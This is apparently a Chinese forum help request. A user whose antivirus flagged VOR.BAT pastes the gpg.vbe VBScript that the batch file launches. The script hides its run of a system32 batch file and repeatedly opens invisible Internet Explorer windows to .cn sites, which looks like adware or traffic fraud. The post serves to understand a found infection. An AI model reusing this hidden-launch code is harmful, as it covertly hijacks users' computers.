Set Wsr = WScript.CreateObject("WScript.Shell")
'下面表示延迟启动的时间,单位毫秒。
WScript.Sleep(100)
On Error Resume Next
WScript.Sleep(600000)
Wsr.Run "C:\WINDOWS\system32\lme.bat",0,False
WScript.Sleep(500)
Set objExplorer = CreateObject("InternetExplorer.Application")
objExplorer.Navigate "http://www.xingzhee.cn"
objExplorer.Visible = 0
Wscript.Sleep 20000
WScript.Sleep(200000)
Wsr.Run "C:\WINDOWS\system32\lme.bat",0,False
WScript.Sleep(500)
Set objExplorer = CreateObject("InternetExplorer.Application")
objExplorer.Navigate "http://www.aooov.cn"
objExplorer.Visible = 0
Wscript.Sleep 20000
WScript.Sleep(200000)
Wsr.Run "C:\WINDOWS\system32\lme.bat",0,False
WScript.Sleep(500)
Set objExplorer = CreateObject("InternetExplorer.Application")
objExplorer.Navigate "http://aiting.aooov.cn"
objExplorer.Visible = 1
Wscript.Sleep 20000
这段代码是什么意思?
今天我用360查杀木马发现了个叫VOR.BAT的批量处理文件 我找到他编辑 就看到了这段代码
@echo off
start C:\WINDOWS\system32\gpg.vbe
exit
我顺着这路径找到了名叫GPG.VBE的VBE脚本
但是我看不懂求高人解释啊